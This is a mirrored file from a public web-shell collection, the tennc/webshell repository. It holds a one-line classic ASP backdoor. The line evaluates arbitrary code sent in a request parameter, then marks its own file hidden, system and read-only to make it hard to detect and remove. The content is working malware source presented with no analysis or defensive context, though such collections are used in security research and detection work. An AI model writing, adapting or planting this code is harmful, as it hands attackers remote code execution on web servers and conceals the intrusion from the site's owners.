mirror of
https://github.com/tennc/webshell
synced 2024-11-12 22:47:15 +00:00
1 line
193 B
Text
1 line
193 B
Text
|
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
|